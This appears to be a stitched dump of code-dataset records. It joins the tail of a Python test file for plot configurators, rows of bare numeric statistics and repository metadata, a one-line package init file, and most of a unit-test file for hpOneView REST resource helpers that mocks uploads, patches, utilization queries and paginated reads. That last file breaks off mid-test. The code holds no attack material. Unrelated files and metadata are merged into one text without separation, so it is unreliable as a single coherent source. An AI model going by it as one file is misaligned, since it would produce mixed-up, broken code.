config = self.configurator(data_source=TEST_DF, x_col_name="a",
y_col_name="b")
view_items = config._data_selection_items()
x_editor = view_items[0].content[3].content[0].content[0].editor
self.assert_editor_options(x_editor)
def test_melt_mode_no_effect(self):
config = self.configurator(data_source=TEST_DF, melt_source_data=True)
self.assertEqual(config.plot_type, self.basic_type)
# No columns to melt, so no transformation:
self.assertIs(config.data_source, TEST_DF)
self.assertIs(config.transformed_data, TEST_DF)
def test_melt_mode_with_melted_columns(self):
config = self.configurator(data_source=TEST_DF, melt_source_data=True,
columns_to_melt=["e", "f"])
self.assertIsNot(config.transformed_data, TEST_DF)
self.assertIs(config.data_source, TEST_DF)
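# pandas.melt stacks the selected columns into "variable"/"value" pairs,
# so the transformed frame has 2 * LEN rows (the "e" block then the "f" block).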
# Pulling the x_arr forces a reset of the x_col_name
x_values = np.array(["e"]*LEN+["f"]*LEN)
assert_array_equal(config.x_arr, x_values)
self.assertEqual(config.x_col_name, "variable")
self.assertEqual(len(config.y_arr), 2 * LEN)
self.assertEqual(config.y_col_name, "value")
config_dict = config.to_dict()
self.assertIsInstance(config_dict, dict)
self.assertIn("x_arr", config_dict)
assert_array_equal(config_dict["x_arr"], x_values)
self.assertIn("y_arr", config_dict)
self.assertEqual(len(config_dict["y_arr"]), 2 * LEN)
def test_melt_mode_with_melted_columns_and_str_color(self):
config = self.configurator(data_source=TEST_DF, melt_source_data=True,
columns_to_melt=["e", "f"], z_col_name="g")
self.assertIsNot(config.transformed_data, TEST_DF)
self.assertIs(config.data_source, TEST_DF)
hue_values = TEST_DF["g"].unique()
# Pulling the x_arr forces a reset of the x_col_name
x_values = np.array(["e"] * (LEN // 2) + ["f"] * (LEN // 2))
self.assertEqual(set(config.x_arr.keys()), set(hue_values))
for key in hue_values:
assert_array_equal(config.x_arr[key], x_values)
self.assertEqual(config.x_col_name, "variable")
for key in hue_values:
self.assertEqual(len(config.y_arr[key]), LEN)
self.assertEqual(config.y_col_name, "value")
self.assertIn("g", config.transformed_data.columns)
config_dict = config.to_dict()
self.assertIsInstance(config_dict, dict)
self.assertIn("x_arr", config_dict)
self.assertEqual(set(config_dict["x_arr"].keys()), set(hue_values))
for key in hue_values:
assert_array_equal(config_dict["x_arr"][key], x_values)
self.assertIn("y_arr", config_dict)
for key in hue_values:
self.assertEqual(len(config_dict["y_arr"][key]), LEN)
def test_melt_mode_with_melted_columns_and_bool_color(self):
config = self.configurator(data_source=TEST_DF, melt_source_data=True,
columns_to_melt=["e", "f"], z_col_name="h")
self.assertIsNot(config.transformed_data, TEST_DF)
self.assertIs(config.data_source, TEST_DF)
hue_values = TEST_DF["h"].unique()
# Pulling the x_arr forces a reset of the x_col_name
x_values = np.array(["e"] * (LEN // 2) + ["f"] * (LEN // 2))
self.assertEqual(set(config.x_arr.keys()), set(hue_values))
for key in hue_values:
assert_array_equal(config.x_arr[key], x_values)
self.assertEqual(config.x_col_name, "variable")
for key in hue_values:
self.assertEqual(len(config.y_arr[key]), LEN)
self.assertEqual(config.y_col_name, "value")
self.assertIn("h", config.transformed_data.columns)
config_dict = config.to_dict()
self.assertIsInstance(config_dict, dict)
self.assertIn("x_arr", config_dict)
self.assertEqual(set(config_dict["x_arr"].keys()), set(hue_values))
for key in hue_values:
assert_array_equal(config_dict["x_arr"][key], x_values)
self.assertIn("y_arr", config_dict)
for key in hue_values:
self.assertEqual(len(config_dict["y_arr"][key]), LEN)
@skipIf(not BACKEND_AVAILABLE, "No UI backend available")
class TestHistogramPlotConfig(BasePlotConfig, TestCase):
def setUp(self):
self.configurator = HistogramPlotConfigurator
self.basic_type = HIST_PLOT_TYPE
self.numerical_cols_only = True
# Tests -------------------------------------------------------------------
def test_plot_basic(self):
config = self.configurator(data_source=TEST_DF, x_col_name="a")
self.assertEqual(config.plot_type, self.basic_type)
config_dict = config.to_dict()
self.assertIsInstance(config_dict, dict)
self.assertIn("x_arr", config_dict)
assert_array_equal(config_dict["x_arr"], TEST_DF["a"].values)
def test_plot_NON_EXISTENT_col(self):
config = self.configurator(data_source=TEST_DF,
x_col_name="NON-EXISTENT")
with self.assertRaises(KeyError):
config.to_dict()
def test_data_choices(self):
""" Make sure different configurators provide the right data choices.
"""
config = self.configurator(data_source=TEST_DF, x_col_name="a")
view_items = config._data_selection_items()
x_editor = view_items[0].content[0].editor
self.assert_editor_options(x_editor)
@skipIf(not BACKEND_AVAILABLE, "No UI backend available")
class TestHeatmapPlotConfig(BasePlotConfig, TestCase):
def setUp(self):
self.configurator = HeatmapPlotConfigurator
self.basic_type = HEATMAP_PLOT_TYPE
self.numerical_cols_only = True
# Tests -------------------------------------------------------------------
def test_plot_basic(self):
config = self.configurator(data_source=TEST_DF, x_col_name="a",
y_col_name="b", z_col_name="e")
self.assertEqual(config.plot_type, self.basic_type)
config_dict = config.to_dict()
self.assertIsInstance(config_dict, dict)
def test_plot_colored_by_NON_EXISTENT_col(self):
config = self.configurator(data_source=TEST_DF, x_col_name="a",
y_col_name="b", z_col_name="NON-EXISTENT")
with self.assertRaises(KeyError):
config.to_dict()
def test_data_choices(self):
""" Make sure different configurators provide the right data choices.
Passing non-numerical
"""
config = self.configurator(data_source=TEST_DF, x_col_name="a",
y_col_name="b", z_col_name="e")
view_items = config._data_selection_items()
x_editor = view_items[0].content[0].editor
self.assert_editor_options(x_editor)
y_editor = view_items[1].content[0].editor
self.assert_editor_options(y_editor)
| 42.422111 | 79 | 0.636105 | 2,185 | 16,884 | 4.598169 | 0.088787 | 0.071663 | 0.039017 | 0.04459 | 0.826615 | 0.815368 | 0.785409 | 0.742013 | 0.724097 | 0.677914 | 0 | 0.007342 | 0.241708 | 16,884 | 397 | 80 | 42.528967 | 0.777396 | 0.060057 | 0 | 0.635135 | 0 | 0 | 0.036625 | 0 | 0 | 0 | 0 | 0 | 0.391892 | 1 | 0.10473 | false | 0 | 0.027027 | 0 | 0.155405 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 6 |
5d173dba73e014674031b329494a05e8bf83b546
| 24 |
py
|
Python
|
vel/notebook/__init__.py
|
tigerwlin/vel
|
00e4fbb7b612e888e2cbb5d8455146664638cd0b
|
[
"MIT"
] | 273 |
2018-09-01T08:54:34.000Z
|
2022-02-02T13:22:51.000Z
|
vel/notebook/__init__.py
|
tigerwlin/vel
|
00e4fbb7b612e888e2cbb5d8455146664638cd0b
|
[
"MIT"
] | 47 |
2018-08-17T11:27:08.000Z
|
2022-03-11T23:26:55.000Z
|
vel/notebook/__init__.py
|
tigerwlin/vel
|
00e4fbb7b612e888e2cbb5d8455146664638cd0b
|
[
"MIT"
] | 37 |
2018-10-11T22:56:57.000Z
|
2020-10-06T19:53:05.000Z
|
from .loader import load
| 24 | 24 | 0.833333 | 4 | 24 | 5 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.125 | 24 | 1 | 24 | 24 | 0.952381 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 |
0
| 6 |
5d6fd80c1e9176894348ae0d83e6981dbb3ecb3a
| 103,544 |
py
|
Python
|
tests/unit/resources/test_resource.py
|
gzecchi/oneview-python
|
949bc67ca3eaed324a6dc058620145d9e067e25b
|
[
"Apache-2.0"
] | null | null | null |
tests/unit/resources/test_resource.py
|
gzecchi/oneview-python
|
949bc67ca3eaed324a6dc058620145d9e067e25b
|
[
"Apache-2.0"
] | null | null | null |
tests/unit/resources/test_resource.py
|
gzecchi/oneview-python
|
949bc67ca3eaed324a6dc058620145d9e067e25b
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
###
# (C) Copyright [2019] Hewlett Packard Enterprise Development LP
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
###
import io
import unittest
import mock
from mock import call
from tests.test_utils import mock_builtin
from hpOneView.connection import connection
from hpOneView import exceptions
from hpOneView.resources.resource import (ResourceClient, ResourceHelper, ResourceFileHandlerMixin,
ResourceZeroBodyMixin, ResourcePatchMixin, ResourceUtilizationMixin,
ResourceSchemaMixin, Resource,
RESOURCE_CLIENT_INVALID_ID, UNRECOGNIZED_URI, TaskMonitor,
RESOURCE_CLIENT_TASK_EXPECTED, RESOURCE_ID_OR_URI_REQUIRED,
transform_list_to_dict, extract_id_from_uri, merge_resources,
merge_default_values, unavailable_method)
class StubResourceFileHandler(ResourceFileHandlerMixin, Resource):
"""Stub class to test resource file operations"""
class StubResourceZeroBody(ResourceZeroBodyMixin, Resource):
"""Stub class to test resoruce zero body methods"""
class StubResourcePatch(ResourcePatchMixin, Resource):
"""Stub class to test resource patch operations"""
class StubResourceUtilization(ResourceUtilizationMixin, Resource):
"""Stub class to test resource utilization methods"""
class StubResourceSchema(ResourceSchemaMixin, Resource):
"""Stub class to test resource schema methods"""
class StubResource(Resource):
"""Stub class to test resource common methods"""
URI = "/rest/testuri"
class BaseTest(unittest.TestCase):
URI = "/rest/testuri"
TYPE_V200 = "typeV200"
TYPE_V300 = "typeV300"
DEFAULT_VALUES = {
"200": {"type": TYPE_V200},
"300": {"type": TYPE_V300}
}
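# DEFAULT_VALUES maps an API version to the "type" value that
# _merge_default_values() (invoked in setUp below) merges into the
# resource data.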
def setUp(self, resource_client=None):
self.resource_client = resource_client
self.resource_client.URI = self.URI
self.resource_client.DEFAULT_VALUES = self.DEFAULT_VALUES
self.resource_client.data = {"uri": "/rest/testuri"}
self.resource_client._merge_default_values()
self.task = {"task": "task", "taskState": "Finished"}
self.response_body = {"body": "body"}
self.custom_headers = {"Accept-Language": "en_US"}
class ResourceFileHandlerMixinTest(BaseTest):
def setUp(self):
self.connection = connection('127.0.0.1', 300)
self.resource_client = StubResourceFileHandler(self.connection)
super(ResourceFileHandlerMixinTest, self).setUp(self.resource_client)
@mock.patch.object(connection, "post_multipart_with_response_handling")
def test_upload_should_call_post_multipart(self, mock_post_multipart):
uri = "/rest/testuri/"
filepath = "test/SPPgen9snap6.2015_0405.81.iso"
mock_post_multipart.return_value = None, mock.Mock()
self.resource_client.upload(filepath, uri)
mock_post_multipart.assert_called_once_with(uri, filepath, "SPPgen9snap6.2015_0405.81.iso")
@mock.patch.object(connection, "post_multipart_with_response_handling")
def test_upload_should_call_post_multipart_with_resource_uri_when_not_uri_provided(self, mock_post_multipart):
filepath = "test/SPPgen9snap6.2015_0405.81.iso"
mock_post_multipart.return_value = None, mock.Mock()
self.resource_client.upload(filepath)
mock_post_multipart.assert_called_once_with("/rest/testuri", mock.ANY, mock.ANY)
@mock.patch.object(connection, "post_multipart_with_response_handling")
@mock.patch.object(TaskMonitor, "wait_for_task")
@mock.patch.object(connection, "get")
def test_upload_should_wait_for_task_when_response_is_task(self, mock_get, mock_wait4task, mock_post_multipart):
uri = "/rest/testuri/"
filepath = "test/SPPgen9snap6.2015_0405.81.iso"
mock_post_multipart.return_value = self.task, mock.Mock()
self.resource_client.upload(filepath, uri)
mock_wait4task.assert_called_once_with(self.task, -1)
@mock.patch.object(connection, "post_multipart_with_response_handling")
@mock.patch.object(TaskMonitor, "wait_for_task")
def test_upload_should_not_wait_for_task_when_response_is_not_task(self, mock_wait4task, mock_post_multipart):
uri = "/rest/testuri/"
filepath = "test/SPPgen9snap6.2015_0405.81.iso"
mock_post_multipart.return_value = None, mock.Mock()
self.resource_client.upload(filepath, uri)
mock_wait4task.assert_not_called()
@mock.patch.object(connection, "post_multipart_with_response_handling")
@mock.patch.object(TaskMonitor, "wait_for_task")
@mock.patch.object(connection, "get")
def test_upload_should_return_associated_resource_when_response_is_task(self, mock_get, mock_wait4task,
mock_post_multipart):
fake_associated_resource = mock.Mock()
uri = "/rest/testuri/"
filepath = "test/SPPgen9snap6.2015_0405.81.iso"
mock_post_multipart.return_value = self.task, mock.Mock()
mock_wait4task.return_value = fake_associated_resource
result = self.resource_client.upload(filepath, uri)
self.assertEqual(result, fake_associated_resource)
@mock.patch.object(connection, "post_multipart_with_response_handling")
@mock.patch.object(TaskMonitor, "wait_for_task")
def test_upload_should_return_resource_when_response_is_not_task(self, mock_wait4task, mock_post_multipart):
fake_response_body = mock.Mock()
uri = "/rest/testuri/"
filepath = "test/SPPgen9snap6.2015_0405.81.iso"
mock_post_multipart.return_value = None, fake_response_body
result = self.resource_client.upload(filepath, uri)
self.assertEqual(result, fake_response_body)
@mock.patch.object(connection, "download_to_stream")
@mock.patch(mock_builtin("open"))
def test_download_should_call_download_to_stream_with_given_uri(self, mock_open, mock_download_to_stream):
file_path = "~/archive.log"
uri = "/rest/testuri/3ec91dd2-0ebb-4484-8b2d-90d065114315"
mock_open.return_value = io.StringIO()
self.resource_client.download(uri, file_path)
mock_download_to_stream.assert_called_once_with(mock.ANY, uri)
@mock.patch.object(connection, "download_to_stream")
@mock.patch(mock_builtin("open"))
def test_download_should_call_download_to_stream_with_open_file(self, mock_open, mock_download_to_stream):
file_path = "~/archive.log"
uri = "/rest/testuri/3ec91dd2-0ebb-4484-8b2d-90d065114315"
fake_file = io.StringIO()
mock_open.return_value = fake_file
self.resource_client.download(uri, file_path)
mock_open.assert_called_once_with(file_path, 'wb')
mock_download_to_stream.assert_called_once_with(fake_file, mock.ANY)
@mock.patch.object(connection, "download_to_stream")
@mock.patch(mock_builtin("open"))
def test_download_should_return_true_when_success(self, mock_open, mock_download_to_stream):
file_path = "~/archive.log"
uri = "/rest/testuri/3ec91dd2-0ebb-4484-8b2d-90d065114315"
mock_download_to_stream.return_value = True
mock_open.return_value = io.StringIO()
result = self.resource_client.download(uri, file_path)
self.assertTrue(result)
@mock.patch.object(connection, "download_to_stream")
@mock.patch(mock_builtin("open"))
def test_download_should_return_false_when_error(self, mock_open, mock_download_to_stream):
file_path = "~/archive.log"
uri = "/rest/testuri/3ec91dd2-0ebb-4484-8b2d-90d065114315"
mock_download_to_stream.return_value = False
mock_open.return_value = io.StringIO()
result = self.resource_client.download(uri, file_path)
self.assertFalse(result)
class ResourceZeroBodyMixinTest(BaseTest):
def setUp(self):
self.connection = connection('127.0.0.1', 300)
self.resource_client = StubResourceZeroBody(self.connection)
super(ResourceZeroBodyMixinTest, self).setUp(self.resource_client)
@mock.patch.object(connection, "post")
@mock.patch.object(TaskMonitor, "wait_for_task")
def test_create_with_zero_body_called_once(self, mock_wait4task, mock_post):
mock_post.return_value = self.task, self.task
mock_wait4task.return_value = self.task
self.resource_client.create_with_zero_body()
mock_post.assert_called_once_with(
"/rest/testuri", {}, custom_headers=None)
@mock.patch.object(connection, "post")
@mock.patch.object(TaskMonitor, "wait_for_task")
def test_create_with_zero_body_called_once_without_uri(self, mock_wait4task, mock_post):
mock_post.return_value = self.task, self.task
mock_wait4task.return_value = self.task
self.resource_client.create_with_zero_body(timeout=-1)
mock_post.assert_called_once_with(
"/rest/testuri", {}, custom_headers=None)
@mock.patch.object(connection, "post")
@mock.patch.object(TaskMonitor, "wait_for_task")
def test_create_with_zero_body_and_custom_headers(self, mock_wait4task, mock_post):
mock_post.return_value = self.task, self.task
mock_wait4task.return_value = self.task
self.resource_client.create_with_zero_body(custom_headers=self.custom_headers)
mock_post.assert_called_once_with(mock.ANY, mock.ANY, custom_headers={"Accept-Language": "en_US"})
@mock.patch.object(connection, "post")
@mock.patch.object(TaskMonitor, "wait_for_task")
def test_create_with_zero_body_return_entity(self, mock_wait4task, mock_post):
response_body = {"resource_name": "name"}
mock_post.return_value = self.task, self.task
mock_wait4task.return_value = response_body
new_resource = self.resource_client.create_with_zero_body(timeout=-1)
self.assertNotEqual(new_resource, self.resource_client)
@mock.patch.object(connection, "post")
def test_create_with_zero_body_without_task(self, mock_post):
mock_post.return_value = None, self.response_body
new_resource = self.resource_client.create_with_zero_body()
self.assertNotEqual(new_resource, self.resource_client)
@mock.patch.object(Resource, "ensure_resource_data")
@mock.patch.object(connection, "put")
@mock.patch.object(TaskMonitor, "wait_for_task")
def test_update_with_zero_body_called_once(self, mock_wait4task, mock_update, mock_ensure_resource):
mock_update.return_value = self.task, self.task
mock_wait4task.return_value = self.task
self.resource_client.URI = "/rest/enclosures"
self.resource_client.update_with_zero_body("/rest/enclosures/09USE133E5H4/configuration",
timeout=-1)
mock_update.assert_called_once_with(
"/rest/enclosures/09USE133E5H4/configuration", None, custom_headers=None)
@mock.patch.object(Resource, "ensure_resource_data")
@mock.patch.object(connection, "put")
@mock.patch.object(TaskMonitor, "wait_for_task")
def test_update_with_zero_body_and_custom_headers(self, mock_wait4task, mock_update, mock_ensure_resource):
mock_update.return_value = self.task, self.task
mock_wait4task.return_value = self.task
self.resource_client.update_with_zero_body(uri="/rest/testuri", custom_headers=self.custom_headers)
mock_update.assert_called_once_with(mock.ANY, mock.ANY, custom_headers={"Accept-Language": "en_US"})
@mock.patch.object(Resource, "ensure_resource_data")
@mock.patch.object(connection, "put")
@mock.patch.object(TaskMonitor, "wait_for_task")
def test_update_with_zero_body_return_entity(self, mock_wait4task, mock_put, mock_ensure_resource):
response_body = {"resource_name": "name"}
self.resource_client.URI = "/rest/enclosures"
mock_put.return_value = self.task, self.task
mock_wait4task.return_value = response_body
result = self.resource_client.update_with_zero_body(
"/rest/enclosures/09USE133E5H4/configuration", timeout=-1)
self.assertEqual(result, response_body)
@mock.patch.object(connection, "put")
def test_update_with_zero_body_without_task(self, mock_put):
mock_put.return_value = None, self.response_body
self.resource_client.URI = "/rest/enclosures"
result = self.resource_client.update_with_zero_body(
"/rest/enclosures/09USE133E5H4/configuration", timeout=-1)
self.assertEqual(result, self.response_body)
class ResourcePatchMixinTest(BaseTest):
def setUp(self):
self.connection = connection('127.0.0.1', 300)
self.resource_client = StubResourcePatch(self.connection)
super(ResourcePatchMixinTest, self).setUp(self.resource_client)
@mock.patch.object(Resource, "ensure_resource_data")
@mock.patch.object(connection, "patch")
def test_patch_request_when_id_is_provided_v200(self, mock_patch, mock_ensure_resource):
uri = "/rest/testuri"
request_body = [{
"op": "replace",
"path": "/name",
"value": "new_name",
}]
mock_patch.return_value = {}, {}
self.connection._apiVersion = 200
self.resource_client.patch("replace", "/name", "new_name")
mock_patch.assert_called_once_with(uri, request_body, custom_headers={})
@mock.patch.object(Resource, "ensure_resource_data")
@mock.patch.object(connection, "patch")
def test_patch_request_when_id_is_provided_v300(self, mock_patch, mock_ensure_resource):
request_body = [{
"op": "replace",
"path": "/name",
"value": "new_name",
}]
mock_patch.return_value = {}, {}
self.resource_client.patch("replace", "/name", "new_name")
mock_patch.assert_called_once_with(
"/rest/testuri", request_body, custom_headers={"Content-Type": "application/json-patch+json"})
@mock.patch.object(Resource, "ensure_resource_data")
@mock.patch.object(connection, "patch")
def test_patch_request_when_uri_is_provided(self, mock_patch, mock_ensure_resource):
request_body = [{
"op": "replace",
"path": "/name",
"value": "new_name",
}]
mock_patch.return_value = {}, {}
self.resource_client.patch("replace", "/name", "new_name")
mock_patch.assert_called_once_with(
"/rest/testuri", request_body, custom_headers={"Content-Type": "application/json-patch+json"})
@mock.patch.object(Resource, "ensure_resource_data")
@mock.patch.object(connection, "patch")
def test_patch_with_custom_headers_v200(self, mock_patch, mock_ensure_resource):
mock_patch.return_value = {}, {}
self.connection._apiVersion = 200
self.resource_client.patch("operation", "/field", "value",
custom_headers=self.custom_headers)
mock_patch.assert_called_once_with(mock.ANY, mock.ANY, custom_headers={"Accept-Language": "en_US"})
@mock.patch.object(Resource, "ensure_resource_data")
@mock.patch.object(connection, "patch")
def test_patch_with_custom_headers_v300(self, mock_patch, mock_ensure_resource):
mock_patch.return_value = {}, {}
self.resource_client.patch("operation", "/field", "value",
custom_headers=self.custom_headers)
mock_patch.assert_called_once_with(mock.ANY,
mock.ANY,
custom_headers={"Accept-Language": "en_US",
"Content-Type": "application/json-patch+json"})
@mock.patch.object(Resource, "ensure_resource_data")
@mock.patch.object(connection, "patch")
@mock.patch.object(TaskMonitor, "wait_for_task")
def test_patch_return_entity(self, mock_wait4task, mock_patch, mock_ensure_resource):
entity = {"resource_id": "123a53cz"}
mock_patch.return_value = self.task, self.task
mock_wait4task.return_value = entity
self.resource_client.patch("replace", "/name", "new_name")
self.assertEqual(self.resource_client.data, entity)
@mock.patch.object(Resource, "ensure_resource_data")
@mock.patch.object(connection, "patch")
@mock.patch.object(TaskMonitor, "get_completed_task")
def test_patch_request_custom_headers_with_content_type(self, mock_task, mock_patch, mock_ensure_resource):
uri = "/rest/testuri"
dict_info = {"resource_name": "a name"}
mock_patch.return_value = {}, {}
headers = {"Content-Type": "application/json",
"Extra": "extra"}
self.connection._apiVersion = 300
self.resource_client.patch_request(uri, body=dict_info, custom_headers=headers)
mock_patch.assert_called_once_with(uri, dict_info, custom_headers=headers)
@mock.patch.object(Resource, "ensure_resource_data")
@mock.patch.object(connection, "patch")
@mock.patch.object(TaskMonitor, "get_completed_task")
def test_patch_request_custom_headers(self, mock_task, mock_patch, mock_ensure_resource):
uri = "/rest/testuri"
dict_info = {"resource_name": "a name"}
mock_patch.return_value = {}, {}
headers = {"Extra": "extra"}
self.connection._apiVersion = 300
self.resource_client.patch_request(uri, body=dict_info, custom_headers=headers)
mock_patch.assert_called_once_with(
uri,
dict_info,
custom_headers={"Extra": "extra",
"Content-Type": "application/json-patch+json"})
@mock.patch.object(Resource, "ensure_resource_data")
@mock.patch.object(connection, "patch")
@mock.patch.object(TaskMonitor, "wait_for_task")
def test_wait_for_activity_on_patch(self, mock_wait4task, mock_patch, mock_ensure_resource):
entity = {"resource_id": "123a53cz"}
mock_patch.return_value = self.task, self.task
mock_wait4task.return_value = entity
self.resource_client.patch("replace", "/name", "new_name")
mock_wait4task.assert_called_once_with(self.task, mock.ANY)
class ResourceUtilizationMixinTest(BaseTest):
def setUp(self):
self.connection = connection('127.0.0.1', 300)
self.resource_client = StubResourceUtilization(self.connection)
super(ResourceUtilizationMixinTest, self).setUp(self.resource_client)
@mock.patch.object(Resource, "ensure_resource_data")
@mock.patch.object(connection, "get")
def test_get_utilization_with_args(self, mock_get, mock_ensure_resource):
self.resource_client.get_utilization(fields="AmbientTemperature,AveragePower,PeakPower",
filter="startDate=2016-05-30T03:29:42.361Z",
refresh=True, view="day")
expected_uri = "/rest/testuri/utilization" \
"?filter=startDate%3D2016-05-30T03%3A29%3A42.361Z" \
"&fields=AmbientTemperature%2CAveragePower%2CPeakPower" \
"&refresh=true" \
"&view=day"
mock_get.assert_called_once_with(expected_uri)
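# Note: get_utilization percent-encodes each query value and, as the next
# test shows, repeats the "filter" key once per filter entry.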
@mock.patch.object(Resource, "ensure_resource_data")
@mock.patch.object(connection, "get")
def test_get_utilization_with_multiple_filters(self, mock_get, mock_ensure_resource):
self.resource_client.get_utilization(
fields="AmbientTemperature,AveragePower,PeakPower",
filter=["startDate=2016-05-30T03:29:42.361Z",
"endDate=2016-05-31T03:29:42.361Z"],
refresh=True,
view="day")
expected_uri = "/rest/testuri/utilization" \
"?filter=startDate%3D2016-05-30T03%3A29%3A42.361Z" \
"&filter=endDate%3D2016-05-31T03%3A29%3A42.361Z" \
"&fields=AmbientTemperature%2CAveragePower%2CPeakPower" \
"&refresh=true" \
"&view=day"
mock_get.assert_called_once_with(expected_uri)
@mock.patch.object(Resource, "ensure_resource_data")
@mock.patch.object(connection, "get")
def test_get_utilization_by_id_with_defaults(self, mock_get, mock_ensure_resource):
self.resource_client.get_utilization()
expected_uri = "/rest/testuri/utilization"
mock_get.assert_called_once_with(expected_uri)
@mock.patch.object(Resource, "ensure_resource_data")
@mock.patch.object(connection, "get")
def test_get_utilization_by_uri_with_defaults(self, mock_get, mock_ensure_resource):
self.resource_client.get_utilization()
expected_uri = "/rest/testuri/utilization"
mock_get.assert_called_once_with(expected_uri)
class ResourceSchemaMixinTest(BaseTest):
def setUp(self):
self.connection = connection('127.0.0.1', 300)
self.resource_client = StubResourceSchema(self.connection)
super(ResourceSchemaMixinTest, self).setUp(self.resource_client)
@mock.patch.object(connection, "get")
def test_get_schema_uri(self, mock_get):
self.resource_client.get_schema()
mock_get.assert_called_once_with(self.URI + "/schema")
class ResourceTest(BaseTest):
def setUp(self):
self.connection = connection('127.0.0.1', 300)
self.resource_client = StubResource(self.connection)
super(ResourceTest, self).setUp(self.resource_client)
self.resource_helper = ResourceHelper(self.URI, self.connection, None)
@mock.patch.object(ResourceHelper, "do_put")
@mock.patch.object(Resource, "ensure_resource_data")
def test_ensure_resource_should_call_once(self, mock_do_put, mock_ensure_resource):
self.resource_client.data = {"uri": "/rest/test"}
self.resource_client.update(data={"name": "test"})
mock_do_put.assert_called_once()
mock_ensure_resource.assert_called_once()
def test_ensure_resource_raise_unique_identifier_exception(self):
self.resource_client.data = []
self.assertRaises(exceptions.HPOneViewMissingUniqueIdentifiers,
self.resource_client.ensure_resource_data)
@mock.patch.object(ResourceHelper, "do_get")
def test_ensure_resource_raise_resource_not_found_exception_with_uri(self, mock_do_get):
self.resource_client.data = {"uri": "/uri/test"}
mock_do_get.return_value = []
with self.assertRaises(exceptions.HPOneViewResourceNotFound):
self.resource_client.ensure_resource_data(update_data=True)
@mock.patch.object(Resource, "get_by")
def test_ensure_resource_raise_resource_not_found_exception_without_uri(self, mock_get_by):
self.resource_client.data = {"name": "testname"}
mock_get_by.return_value = []
with self.assertRaises(exceptions.HPOneViewResourceNotFound):
self.resource_client.ensure_resource_data(update_data=True)
@mock.patch.object(ResourceHelper, "do_get")
@mock.patch.object(Resource, "get_by")
def test_ensure_resource_should_update_resource_data(self, mock_do_get, mock_get_by):
get_by_return_value = [{"name": "testname", "uri": "/rest/testuri"}]
self.resource_client.data = {"name": "testname"}
mock_do_get.return_value = get_by_return_value
self.resource_client.ensure_resource_data(update_data=True)
self.assertEqual(self.resource_client.data, get_by_return_value[0])
@mock.patch.object(Resource, "get_by")
def test_ensure_resource_without_data_update(self, mock_get_by):
mock_get_by.return_value = []
actual_result = self.resource_client.ensure_resource_data(update_data=False)
expected_result = None
self.assertEqual(actual_result, expected_result)
@mock.patch.object(connection, "get")
def test_get_all_called_once(self, mock_get):
filter = "'name'='OneViewSDK \"Test FC Network'"
sort = "name:ascending"
query = "name NE 'WrongName'"
mock_get.return_value = {"members": [{"member": "member"}]}
result = self.resource_helper.get_all(
1, 500, filter, query, sort)
uri = "{resource_uri}?start=1" \
"&count=500" \
"&filter=%27name%27%3D%27OneViewSDK%20%22Test%20FC%20Network%27" \
"&query=name%20NE%20%27WrongName%27" \
"&sort=name%3Aascending".format(resource_uri=self.URI)
self.assertEqual([{"member": "member"}], result)
mock_get.assert_called_once_with(uri)
@mock.patch.object(connection, "get")
def test_get_all_with_defaults(self, mock_get):
self.resource_client.get_all()
uri = "{resource_uri}?start=0&count=-1".format(resource_uri=self.URI)
mock_get.assert_called_once_with(uri)
@mock.patch.object(connection, "get")
def test_get_all_with_custom_uri(self, mock_get):
self.resource_helper.get_all(uri="/rest/testuri/12467836/subresources")
uri = "/rest/testuri/12467836/subresources?start=0&count=-1"
mock_get.assert_called_once_with(uri)
@mock.patch.object(connection, "get")
def test_get_all_with_custom_uri_and_query_string(self, mock_get):
self.resource_helper.get_all(uri="/rest/testuri/12467836/subresources?param=value")
uri = "/rest/testuri/12467836/subresources?param=value&start=0&count=-1"
mock_get.assert_called_once_with(uri)
@mock.patch.object(connection, "get")
def test_get_all_with_different_resource_uri_should_fail(self, mock_get):
try:
self.resource_helper.get_all(uri="/rest/other/resource/12467836/subresources")
except exceptions.HPOneViewUnknownType as e:
self.assertEqual(UNRECOGNIZED_URI, e.args[0])
else:
self.fail("Expected Exception was not raised")
@mock.patch.object(connection, "get")
def test_get_all_should_do_multi_requests_when_response_paginated(self, mock_get):
uri_list = ["/rest/testuri?start=0&count=-1",
"/rest/testuri?start=3&count=3",
"/rest/testuri?start=6&count=3"]
results = [{"nextPageUri": uri_list[1], "members": [{"id": "1"}, {"id": "2"}, {"id": "3"}]},
{"nextPageUri": uri_list[2], "members": [{"id": "4"}, {"id": "5"}, {"id": "6"}]},
{"nextPageUri": None, "members": [{"id": "7"}, {"id": "8"}]}]
mock_get.side_effect = results
self.resource_client.get_all()
expected_calls = [call(uri_list[0]), call(uri_list[1]), call(uri_list[2])]
self.assertEqual(mock_get.call_args_list, expected_calls)
@mock.patch.object(connection, "get")
def test_get_all_with_count_should_do_multi_requests_when_response_paginated(self, mock_get):
uri_list = ["/rest/testuri?start=0&count=15",
"/rest/testuri?start=3&count=3",
"/rest/testuri?start=6&count=3"]
results = [{"nextPageUri": uri_list[1], "members": [{"id": "1"}, {"id": "2"}, {"id": "3"}]},
{"nextPageUri": uri_list[2], "members": [{"id": "4"}, {"id": "5"}, {"id": "6"}]},
{'nextPageUri': None, "members": [{"id": "7"}, {"id": "8"}]}]
mock_get.side_effect = results
self.resource_client.get_all(count=15)
expected_calls = [call(uri_list[0]), call(uri_list[1]), call(uri_list[2])]
